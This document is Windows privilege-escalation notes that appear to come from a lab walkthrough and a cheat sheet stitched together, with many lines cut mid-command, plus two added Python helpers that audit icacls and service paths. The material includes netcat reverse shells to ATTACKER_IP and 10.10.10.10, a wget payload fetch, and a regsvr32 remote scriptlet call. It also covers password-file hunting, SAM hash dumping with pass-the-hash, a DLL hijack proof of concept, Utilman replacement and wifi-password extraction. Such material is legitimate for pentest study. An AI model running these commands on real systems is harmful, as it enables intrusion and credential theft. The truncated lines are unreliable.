Windows Privilege Escalation
Windows Users
Windows systems mainly have two kinds of users. Depending on their access levels, we can categorise a user in one of the following groups:
Administrators: These users have the most privileges. They can change any system configuration parameter and access any file in the system.
Standard Users: These users can access the computer but only perform limited tasks. Typically these users can not make permanent or essential changes to the system and are limited to their own files.
SYSTEM / LocalSystem: An account used by the operating system to perform internal tasks. It has full access to all files and resources available on the host, with even higher privileges than administrators.
Local Service: Default account used to run Windows services with "minimum" privileges. It will use anonymous connections over the network.
Network Service: Default account used to run Windows services with "minimum" privileges. It will use the computer credentials to authenticate through the network.
Unattended Windows Installations
Places to search for passwords are:
C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
PowerShell History
To see the PowerShell command history from CMD, use this command:
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShe
Saved credentials can be listed with:
cmdkey /list
While you can't see the actual passwords, if you notice any credentials worth trying, you can use them with the runas command and the /savecred option, as seen below.
IIS Configuration
C:\inetpub\wwwroot\web.config
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\w
Scheduled Tasks
Looking into scheduled tasks on the target system, you may see a scheduled task that either lost its binary or is using a binary you can modify.
Scheduled tasks can be listed from the command line using the schtasks command without any options.
The "Task to Run" parameter which indicates what gets executed by the scheduled task, and
the "Run As User" parameter, which shows the user that will be used to execute the task.
icacls c:\tasks\schtask.bat
If our current user can modify or overwrite the "Task to Run" executable, We Will Set NC
Reverse Shell There
Here BUILTIN\Users her Full Permission So Lets Change the Bat file to Execute a Rev shell.
echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks
AlwaysInstallElevated
Windows installer files (also known as .msi files) are used to install applications on the system. They usually run with the privilege level of the user that starts them. However, they can be configured to run with higher privileges from any user account (even unprivileged ones). This could potentially allow us to generate a malicious MSI file that would run with admin privileges.
Note: The AlwaysInstallElevated method won't work on this
room's machine and it's included as information only.
This method requires two registry values to be set. You can query these from the command
line using the commands below.
To be able to exploit this vulnerability, both should be set. Otherwise, exploitation will not be
possible. If these are set, you can generate a malicious .msi file using msfvenom, as seen
below:
As this is a reverse shell, you should also run the Metasploit Handler module configured
accordingly. Once you have transferred the file you have created, you can run the installer
with the command below and receive the reverse shell:
All services have an executable assigned to them. To change it or make any other edit, we need to be allowed to by the service's Discretionary Access Control List (DACL), which basically defines who has permission to start, stop, restart, query the config or reconfigure the service.
Here we can see that the associated executable is specified through the BINARY_PATH_NAME parameter, and the account used to run the service is shown in the SERVICE_START_NAME parameter.
C:\> sc qc apphostsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: apphostsvc
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Windows\system32\svchost.ex
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Application Host Helper Servic
DEPENDENCIES :
SERVICE_START_NAME : localSystem
The service configuration is also stored in the registry under HKLM\SYSTEM\CurrentControlSet\Services\<service_name>
A subkey exists for every service in the system. Again, we can see the associated executable in the ImagePath value and the account used to start the service in the ObjectName value. If a DACL has been configured for the service, it will be stored in a subkey called Security. As you have guessed by now, only administrators can modify such registry entries by default.
Insecure Permissions on Service Executable
If the executable associated with a service has weak permissions that allow an
attacker to modify or replace it, the attacker can gain the privileges of the service's
account trivially.
C:\> sc qc WindowsScheduler
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: windowsscheduler
TYPE : 10 WIN32_OWN_PR
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\PROGRA~2\SYST
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : System Scheduler
DEPENDENCIES :
SERVICE_START_NAME : .\svcuser1
Let's see if we can modify this exe to run a netcat reverse shell by editing it.
To check the permissions on any file we use icacls:
C:\Users\thm-unpriv>icacls C:\PROGRA~2\SYSTEM
C:\PROGRA~2\SYSTEM~1\WService.exe Everyone:(I
NT AUTHORIT BUILTIN\Adm BUILTIN\Use
APPLICATION APPLICATION
First, create an exe file using msfvenom on the attacker machine and upload it to the target with wget.
Attacker machine
Victim machine
wget http://ATTACKER_IP:8000/rev-svc.exe -O r
C:\> cd C:\PROGRA~2\SYSTEM~1\
Attacker machine
Finally, restart the service to execute the reverse shell exe we created.
Booooooommmmmmmmmmm
C:\Windows\system32>whoami
wprivesc1\svcusr1
Got the shell!
POC:
Unquoted Service Paths
When we can't directly write into service executables as before, there might still be a
chance to force a service into running arbitrary executables by using a rather obscure
feature.
Example :
C:\> sc qc "vncserver"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: vncserver
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : "C:\Program Files\RealVNC\VNC
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : VNC Server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
The SCM tries to execute the exe file, but there is one problem: whenever there are spaces in the unquoted path, for example when the executable is in a folder named 'Service Server Files', the SCM cannot tell where the executable name ends and has multiple candidate paths, which a user can abuse to get the service to execute their own exe and obtain a shell.
Think of it as reading the path character by character with no notion of quoting: when you reach a space, you stop and assume the name ended there. The SCM does the same, tries that shorter name first and, if nothing is found there, continues past the space and tries the next possible name.
If we have write permission to one of those directories, we can exploit this. Let's do it in practice:
C:\>icacls c:\MyPrograms
c:\MyPrograms NT AUTHORITY\SYSTEM:(I)(OI)
BUILTIN\Administrators:(I)( BUILTIN\Users:(I)
(OI)(CI)(R BUILTIN\Users:(I)(CI)(AD)
BUILTIN\Users:(I)(CI)(WD)
CREATOR OWNER:(I)(OI)(CI)(I
Now let's move the exe to that path (important step):
Restart the service
C:\Windows\system32>whoami
wprivesc1\svcusr2
POC:
Insecure Service Permissions
What if we have permission to edit the configuration of the service itself?
We will have access to change the Exec File to anywhere we want !! Simple As Fuck <3
Let's do it in practice.
To find out whether our user is allowed to edit the service's permissions, we use the Sysinternals utility Accesschk.
Link to Accesschk: https://learn.microsoft.com/en-us/sysinternals/downloads/accesschk
SERVICE_START
SERVICE_STOP
SERVICE_USER_DEFINED_CONTROL
READ_CONTROL
[4] ACCESS_ALLOWED_ACE_TYPE:
BUILTIN\Users SERVICE_ALL_ACCESS
Privileges are rights to perform a task. For example, you are not allowed to rearrange your bed the way you want because your mom doesn't allow it ;) Jokes apart, a privilege is a right assigned to an account to perform a specific task.
whoami /priv
SeBackup / SeRestore
C:\Windows\system32>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description
============================= ===============
SeBackupPrivilege Back up files a
SeRestorePrivilege Restore files a
SeShutdownPrivilege Shut down the s
SeChangeNotifyPrivilege Bypass traverse
SeIncreaseWorkingSetPrivilege Increase a proc
C:\Windows\system32>
As we can see, we have the SeBackup/SeRestore privileges.
mkdir share
impacket-smbserver -smb2support -username THM
Administrator:500:aad3b435b51404eeaad3b435b51
Guest:501:aad3b435b51404eeaad3b435b51404ee:31
DefaultAccount:503:aad3b435b51404eeaad3b435b5
WDAGUtilityAccount:504:aad3b435b51404eeaad3b4
THMBackup:1008:aad3b435b51404eeaad3b435b51404
THMTakeOwnership:1009:aad3b435b51404eeaad3b43
[*] Cleaning up...
impacket-psexec -hashes aad3b435b51404eeaad3b
Impacket v0.11.0 - Copyright 2023 Fortra
C:\Windows\system32>
POC:
SeTakeOwnership
The SeTakeOwnership privilege allows a user to take ownership of any object on the system, including files and registry keys, opening up many possibilities for an attacker to elevate privileges.
C:\Windows\system32>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description
============================= ===============
SeTakeOwnershipPrivilege Take ownership
SeChangeNotifyPrivilege Bypass traverse
SeIncreaseWorkingSetPrivilege Increase a proc
C:\Windows\system32>
C:\Windows\system32>takeown /f C:\Windows\Sys
C:\Windows\system32>
Now that we are the owner, let's give ourselves full permissions to edit and change this file:
C:\Windows\system32>icacls C:\Windows\System3
processed file: C:\Windows\System32\Utilman.e
Successfully processed 1 files; Failed proces
C:\Windows\system32>
C:\Windows\system32>copy Utilman.exe
cmd.exe Overwrite cmd.exe? (Yes/No/All): All
Access is denied.
0 file(s) copied.
C:\Windows\system32>
Now let's run Utilman. For this we need to lock the screen and launch it from the lock screen's Ease of Access button 😒
SeImpersonate / SeAssignPrimaryToken
To use RogueWinRM, we first need to upload the exploit to the
target machine. For your convenience, this has already been done,
and you can find the exploit in the C:\tools\ folder.
The RogueWinRM exploit is possible because whenever a user
(including unprivileged users) starts the BITS service in Windows, it
automatically creates a connection to port 5985 using SYSTEM
privileges. Port 5985 is typically used for the WinRM service, which
is simply a port that exposes a Powershell console to be used
remotely through the network. Think of it like SSH, but using
Powershell.
If, for some reason, the WinRM service isn't running on the victim
server, an attacker can start a fake WinRM service on port 5985 and
catch the authentication attempt made by the BITS service when
starting. If the attacker has SeImpersonate privileges, he can execute
any command on behalf of the connecting user, which is SYSTEM.
c:\tools\RogueWinRM\RogueWinRM.exe -p "C:\too
Now we just need to listen on port 4442.
You can use the wmic tool to list software installed on the target
system and its versions.
Windows - Privilege Escalation
Summary
Tools
Windows Version and Configuration
User Enumeration
Network Enumeration
Antivirus Enumeration
Default Writeable Folders
EoP - Looting for passwords
SAM and SYSTEM files
HiveNightmare
LAPS Settings
Search for file contents
Search for a file with a certain filename
Search the registry for key names and passwords
Passwords in unattend.xml
Wifi passwords
Sticky Notes passwords
Passwords stored in services
Passwords stored in Key Manager
Powershell History
Powershell Transcript
Password in Alternate Data Stream
EoP - Processes Enumeration and Tasks
EoP - Incorrect permissions in services
EoP - Windows Subsystem for Linux (WSL)
EoP - Unquoted Service Paths
EoP - $PATH Interception
EoP - Named Pipes
EoP - Kernel Exploitation
EoP - Microsoft Windows Installer
AlwaysInstallElevated
CustomActions
EoP - Insecure GUI apps
EoP - Evaluating Vulnerable Drivers
EoP - Printers
Universal Printer
Bring Your Own Vulnerability
EoP - Runas
EoP - Abusing Shadow Copies
EoP - From local administrator to NT SYSTEM
EoP - Living Off The Land Binaries and Scripts
EoP - Impersonation Privileges
Restore A Service Account's Privileges
Meterpreter getsystem and alternatives
RottenPotato (Token Impersonation)
Juicy Potato (Abusing the golden privileges)
Rogue Potato (Fake OXID Resolver)
EFSPotato (MS-EFSR EfsRpcOpenFileRaw)
EoP - Privileged File Write
DiagHub
UsoDLLLoader
WerTrigger
WerMgr
EoP - Common Vulnerabilities and Exposures
MS08-067 (NetAPI)
MS10-015 (KiTrap0D)
MS11-080 (adf.sys)
MS15-051 (Client Copy Image)
MS16-032
MS17-010 (Eternal Blue)
CVE-2019-1388
EoP - $PATH Interception
References
Tools
PowerSploit's PowerUp
./windows-exploit-suggester.py --update
./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-system
wmic qfe
Architecture
set
Get-ChildItem Env: | ft Key,Value
User Enumeration
Get current username
whoami /priv
whoami /groups
net user
whoami /all
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
net accounts
net localgroup
Get-LocalGroup | ft Name
nltest /DCLIST:DomainName
nltest /DCNAME:DomainName
nltest /DSGETDC:DomainName
Network Enumeration
List all network interfaces, IP, and DNS.
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
netstat -ano
net share
powershell Find-DomainShare -ComputerDomain domain.local
SNMP Configuration
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
Antivirus Enumeration
Default Writeable Folders
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\spool\printers
C:\Windows\System32\spool\servers
C:\Windows\tracing
C:\Windows\Temp
C:\Users\Public
C:\Windows\Tasks
C:\Windows\System32\tasks
C:\Windows\SysWOW64\tasks
C:\Windows\System32\tasks_migrated\microsoft\windows\pls\system
C:\Windows\SysWOW64\tasks\microsoft\windows\pls\system
C:\Windows\debug\wia
C:\Windows\registration\crmlog
C:\Windows\System32\com\dmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\System32\fxstmp
C:\Windows\SysWOW64\fxstmp
HiveNightmare
CVE-2021-36934 allows you to retrieve all registry hives (SAM, SECURITY, SYSTEM) in Windows 10 and 11 as a non-administrator user.
Then exploit the CVE by requesting the shadowcopies on the filesystem and reading the hives from it.
LAPS Settings
Extract HKLM\Software\Policies\Microsoft Services\AdmPwd from Windows Registry.
Passwords in unattend.xml
Location of the unattend.xml files.
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
Display the content of these files with dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
Example content
<UserAccounts>
<LocalAccounts>
<LocalAccount wcm:action="add">
<Password>*SENSITIVE*DATA*DELETED*</Password>
<Group>administrators;users</Group>
<Name>Administrateur</Name>
</LocalAccount>
</LocalAccounts>
</UserAccounts>
Unattend credentials are stored in base64 and can be decoded manually with base64.
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
C:\inetpub\wwwroot\web.config
Other files
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts
C:\ProgramData\Configs\*
C:\Program Files\Windows PowerShell\*
dir c:*vnc.ini /s /b
dir c:*ultravnc.ini /s /b
Wifi passwords
Find AP SSID
Oneliner method to extract wifi passwords from all the access point.
cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "'
Sticky Notes passwords
The Sticky Notes app stores its content in a SQLite database located at C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite
https://tinyurl.com/2cdzl9hw
Import-Module path\to\SessionGopher.ps1;
Invoke-SessionGopher -AllDomain -o
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
rundll32 keymgr,KRShowKeyMgr
Powershell History
Disable PowerShell history: Set-PSReadlineOption -HistorySaveStyle SaveNothing
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_hist
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw
Powershell Transcript
C:\Users\<USERNAME>\Documents\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt
C:\Transcripts\<DATE>\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt
tasklist /v
net start
sc query
Get-Service
Get-Process
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} |
List services
net start
wmic service list brief
tasklist /SVC
Startup tasks
DLL Hijacking
// content of windows_dll.c
#include <windows.h>
#include <stdlib.h>   /* system() */

/* Proof-of-concept DLL for hijack testing: when the host process loads it,
   it records which account the process runs as and then exits the host. */
BOOL WINAPI DllMain(HINSTANCE hDll, DWORD dwReason, LPVOID lpReserved) {
    if (dwReason == DLL_PROCESS_ATTACH) {
        /* write the identity of the loading process to a file for inspection */
        system("cmd.exe /k whoami > C:\\Windows\\Temp\\dll.txt");
        ExitProcess(0);
    }
    return TRUE;
}
Note: to check file permissions you can use cacls and icacls.
You are looking for BUILTIN\Users:(F) (Full access), BUILTIN\Users:(M) (Modify access) or
BUILTIN\Users:(W) (Write-only access) in the output.
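The following Python helper is an added example, not code from the original notes: it parses icacls output and flags ACEs that grant write rights (F, M, W, or specific rights such as WD/AD/WDAC/WO) to principals every local user belongs to. It serves the icacls checks on the scheduled task script, the service executable and the service directory in the sections above; the two icacls outputs below are constructed samples modelled on those sections, not captured from a real host.

```python
import re
from typing import List, Tuple

# Principals that every interactive local user belongs to; any write right
# granted to them is effectively granted to an unprivileged attacker.
LOW_PRIV_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}
# Simple rights (F, M, W) and specific rights that let the holder change the
# object's content or its security descriptor (write data, append, write DAC,
# write owner, delete, generic write/all).
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "WEA", "WDAC", "WO", "D", "DC", "GW", "GA"}
INHERITANCE_FLAGS = {"I", "OI", "CI", "IO", "NP"}
ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<flags>(?:\([^)]*\))+)$")

# Constructed icacls outputs (not captured from a real host), modelled on the
# WService.exe and c:\MyPrograms checks in the notes above.
SERVICE_EXE = r"C:\PROGRA~2\SYSTEM~1\WService.exe"
SERVICE_EXE_ACL = r"""
C:\PROGRA~2\SYSTEM~1\WService.exe Everyone:(I)(F)
                                  NT AUTHORITY\SYSTEM:(I)(F)
                                  BUILTIN\Administrators:(I)(F)
                                  BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""
PROGRAM_DIR = r"c:\MyPrograms"
PROGRAM_DIR_ACL = r"""
c:\MyPrograms NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
              BUILTIN\Administrators:(I)(OI)(CI)(F)
              BUILTIN\Users:(I)(OI)(CI)(RX)
              BUILTIN\Users:(I)(CI)(AD)
              BUILTIN\Users:(I)(CI)(WD)
              CREATOR OWNER:(I)(OI)(CI)(IO)(F)
"""


def parse_icacls(path: str, output: str) -> List[Tuple[str, List[str]]]:
    """Turn icacls output for `path` into (principal, [rights]) pairs."""
    aces = []
    for line in output.splitlines():
        line = line.strip()
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()   # first line carries the path
        m = ACE_RE.match(line)
        if not m:
            continue                           # blank or summary line
        rights = []
        for group in re.findall(r"\(([^)]*)\)", m.group("flags")):
            for token in group.split(","):
                token = token.strip()
                if token and token not in INHERITANCE_FLAGS:
                    rights.append(token)
        aces.append((m.group("principal"), rights))
    return aces


def find_weak_aces(path: str, output: str) -> List[Tuple[str, List[str]]]:
    """Return (principal, [write rights]) for every low-privilege write grant."""
    findings = []
    for principal, rights in parse_icacls(path, output):
        if principal.lower() in LOW_PRIV_PRINCIPALS:
            granted = sorted(set(rights) & WRITE_RIGHTS)
            if granted:
                findings.append((principal, granted))
    return findings


if __name__ == "__main__":
    for target, acl in ((SERVICE_EXE, SERVICE_EXE_ACL), (PROGRAM_DIR, PROGRAM_DIR_ACL)):
        print(target, "->", find_weak_aces(target, acl) or "no low-privilege write access")
```

Run it against real output by piping `icacls <path>` into the script on the host under review; a non-empty result for a service binary, task script or their directories is a finding to fix by removing the grant.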
SERVICE_NAME: usosvc
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Update Orchestrator Service
DEPENDENCIES : rpcss
SERVICE_START_NAME : LocalSystem
With root privileges, Windows Subsystem for Linux (WSL) allows users to create a bind shell on any port (no elevation needed). Don't know the root password? No problem, just set the default user to root with .exe --default-user root. Now start your bind or reverse shell.
wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMo
...
[*] Checking for unquoted service paths...
ServiceName : BBSvc
Path : C:\Program Files\Microsoft\Bing Bar\7.1\BBSvc.exe
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -ServiceName 'BBSvc' -Path <HijackPath>
...
# automatic exploit
Invoke-ServiceAbuse -Name [SERVICE_NAME] -Command "..\..\Users\Public\nc.exe 10.10.10.10 4
Example
For C:\Program Files\something\legit.exe, Windows will try the following paths first:
C:\Program.exe
C:\Program Files.exe
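As an added audit helper (not part of the original notes), the following Python script applies the interpretation documented for CreateProcess to an unquoted image path: at each space the prefix is tried with .exe appended, stopping at the first prefix that already ends in .exe. It parses a constructed sc qc output modelled on the vncserver example in the Unquoted Service Paths section above and reports which directories need an icacls check for write access by non-administrators.

```python
import ntpath
from typing import Dict, List, Optional

# Constructed sample of `sc qc vncserver` output (not captured from a real host);
# the unquoted BINARY_PATH_NAME contains two spaces.
SAMPLE_SC_QC = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: vncserver
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\RealVNC\VNC Server\vncserver.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : VNC Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""


def sc_qc_value(sc_output: str, key: str) -> Optional[str]:
    """Return the value of one `KEY : value` line from sc qc output."""
    for line in sc_output.splitlines():
        name, sep, value = line.partition(":")
        if sep and name.strip() == key:
            return value.strip()
    return None


def scm_candidates(binary_path: str) -> List[str]:
    """Image paths CreateProcess tries, in order, for the given BINARY_PATH_NAME.

    A quoted path is unambiguous and yields no candidates. Otherwise the path is
    cut at every space; the prefix gets ".exe" appended unless it already ends in
    ".exe", in which case it is taken as the real image and the search stops.
    """
    path = binary_path.strip()
    if path.startswith('"'):
        return []
    candidates: List[str] = []
    for idx, ch in enumerate(path):
        if ch != " ":
            continue
        prefix = path[:idx]
        if prefix.lower().endswith(".exe"):
            candidates.append(prefix)
            return candidates
        candidates.append(prefix + ".exe")
    candidates.append(path if path.lower().endswith(".exe") else path + ".exe")
    return candidates


def audit_service(sc_output: str) -> Dict[str, object]:
    """Summarise the unquoted-path exposure of one service from its sc qc output."""
    service = sc_qc_value(sc_output, "SERVICE_NAME") or ""
    binary_path = sc_qc_value(sc_output, "BINARY_PATH_NAME") or ""
    candidates = scm_candidates(binary_path)
    # Everything before the last candidate is tried before the real image, so a
    # non-admin write right on any of these parent directories is a finding.
    hijack_dirs = list(dict.fromkeys(ntpath.dirname(c) for c in candidates[:-1]))
    return {
        "service": service,
        "run_as": sc_qc_value(sc_output, "SERVICE_START_NAME"),
        "binary_path": binary_path,
        "vulnerable_path": bool(hijack_dirs),
        "candidates": candidates,
        "hijack_dirs": hijack_dirs,
    }


if __name__ == "__main__":
    for key, value in audit_service(SAMPLE_SC_QC).items():
        print(f"{key}: {value}")
```

The fix for a flagged service is to quote the path (sc config <service> binPath= "\"C:\path with spaces\svc.exe\"") and to make sure the listed directories are not writable by standard users.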
EXAMPLE:
Because (in this example) "C:\Program Files\nodejs" is before "C:\WINDOWS\system32" on the PATH
variable, the next time the user runs "cmd.exe", our evil version in the nodejs folder will run, instead of
the legitimate one in the system32 folder.
MS17-017 [KB4013081] [GDI Palette Objects Local Privilege Escalation] (windows 7/8)
CVE-2017-8464 [LNK Remote Code Execution Vulnerability] (windows
10/8.1/7/2016/2010/2008)
CVE-2017-0213 [Windows COM Elevation of Privilege Vulnerability] (windows
10/8.1/7/2016/2010/2008)
CVE-2018-0833 [SMBv3 Null Pointer Dereference Denial of Service] (Windows 8.1/Server 2012
R2)
CVE-2018-8120 [Win32k Elevation of Privilege Vulnerability] (Windows 7 SP1/2008 SP2,2008 R2
SP1)
MS17-010 [KB4013389] [Windows Kernel Mode Drivers] (windows 7/2008/2003/XP)
MS16-135 [KB3199135] [Windows Kernel Mode Drivers] (2016)
MS16-111 [KB3186973] [kernel api] (Windows 10 10586 (32/64)/8.1)
MS16-098 [KB3178466] [Kernel Driver] (Win 8.1)
MS16-075 [KB3164038] [Hot Potato] (2003/2008/7/8/2012)
MS16-034 [KB3143145] [Kernel Driver] (2008/7/8/10/2012)
MS16-032 [KB3143141] [Secondary Logon Handle] (2008/7/8/10/2012)
MS16-016 [KB3136041] [WebDAV] (2008/Vista/7)
MS16-014 [K3134228] [remote code execution] (2008/Vista/7)
...
MS03-026 [KB823980] [Buffer Overrun In RPC Interface] (/NT/2000/XP/2003)
AlwaysInstallElevated
Using the reg query command, you can check the status of the AlwaysInstallElevated registry key
for both the user and the machine. If both queries return a value of 0x1 , then
AlwaysInstallElevated is enabled for both user and machine, indicating the system is vulnerable.
Shell command
PowerShell command
Get-ItemProperty HKLM\Software\Policies\Microsoft\Windows\Installer
Get-ItemProperty HKCU\Software\Policies\Microsoft\Windows\Installer
Metasploit : exploit/windows/local/always_install_elevated
PowerUp.ps1 : Get-RegistryAlwaysInstallElevated , Write-UserAddMSI
CustomActions
Custom Actions in MSI allow developers to specify scripts or executables to be run at various
points during an installation
mgeeky/msidump - a tool that analyzes malicious MSI installation packages, extracts files,
streams, binary data and incorporates YARA scanner.
activescott/lessmsi - A tool to view and extract the contents of an Windows Installer (.msi) file.
mandiant/msi-search - This tool simplifies the task for red team operators and security teams to
identify which MSI files correspond to which software and enables them to download the
relevant file.
Execute the repair process with the /fa parameter to trigger the CustomActions. We can use either the IdentifyingNumber {E0F1535A-8414-5EF1-A1DD-E17EDCDC63F1} or the path to the installer c:\windows\installer\XXXXXXX.msi. The repair will run with the NT SYSTEM account.
Missing quiet parameters: it will spawn conhost.exe as NT SYSTEM. Use [CTRL]+[A] to select some text in it; this pauses the execution.
conhost -> properties -> "legacy console mode" Link -> Internet Explorer -> CTRL+O –>
cmd.exe
GUI with direct actions: open a URL and start the browser then use the same scenario.
Binaries/Scripts loaded from user writable paths: you might need to win the race condition.
DLL hijacking/search order abusing
PowerShell -NoProfile missing: Add custom commands into your profile
Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click on "Click
to open Command Prompt"
Living Off The Land Drivers is a curated list of Windows drivers used by adversaries to bypass
security controls and carry out attacks. The project helps security professionals stay informed and
mitigate potential threats.
Native binary: DriverQuery.exe
matterpreter/OffensiveCSharp/DriverQuery
EoP - Printers
Universal Printer
Create a Printer
$serverName = 'dc.purple.lab'
$printerName = 'Universal Priv Printer'
$fullprinterName = '\\' + $serverName + '\' + $printerName + ' - ' + $(If ([System.Environment
Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue
Add-Printer -ConnectionName $fullprinterName
PrinterNightmare
cp_server.exe -e ACIDDAMAGE
# Get-Printer
# Set the "Advanced Sharing Settings" -> "Turn off password protected sharing"
cp_client.exe -r 10.0.0.9 -n ACIDDAMAGE -e ACIDDAMAGE
cp_client.exe -l -e ACIDDAMAGE
EoP - Runas
cmdkey /list
Currently stored credentials:
Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator
Then you can use runas with the /savecred options in order to use the saved credentials. The
following example is calling a remote binary via an SMB share.
PsExec.exe -i -s cmd.exe
The goal of the LOLBAS project is to document every binary, script, and library that can be used
for Living Off The Land techniques.
A LOLBin/Lib/Script must:
Be a Microsoft-signed file, either native to the OS or downloaded from Microsoft. Have extra
"unexpected" functionality. It is not interesting to document intended use cases. Exceptions are
application whitelisting bypasses
Have functionality that would be useful to an APT or red team
wmic.exe process call create calc
regsvr32 /s /n /u /i:https://tinyurl.com/2a8yook3 scrobj.dll
Microsoft.Workflow.Compiler.exe tests.xml results.xml
Privilege | Impact | Tool | Execution path | Remarks

SeBackup
Impact: Threat
Tool: Built-in commands
Execution path: Read sensitive files with robocopy /b
Remarks:
- SeBackupPrivilege (and robocopy) is not helpful when it comes to open files.
- Robocopy requires both SeBackup and SeRestore to work with the /b parameter.

SeCreateToken
Impact: Admin
Tool: 3rd party tool
Execution path: Create an arbitrary token including local admin rights with NtCreateToken.

(privilege name missing in the source)
Remarks: Alternatively, the privilege may be used to unload security-related drivers with the fltMC built-in command, i.e.: fltMC sysmondrv

SeRestore
Impact: Admin
Tool: PowerShell
Execution path:
1. Launch PowerShell/ISE with the SeRestore privilege present.
2. Enable the privilege with Enable-SeRestorePrivilege.
3. Rename utilman.exe to utilman.old
4. Rename cmd.exe to utilman.exe
5. Lock the console and press Win+U
Remarks: Attack may be detected by some AV software. Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege.

SeTakeOwnership
Impact: Admin
Tool: Built-in commands
Execution path:
1. takeown.exe /f "%windir%\system32"
2. icacls.exe "%windir%\system32" /grant "%username%":F
3. Rename cmd.exe to utilman.exe
4. Lock the console and press Win+U
Remarks: Attack may be detected by some AV software. Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege.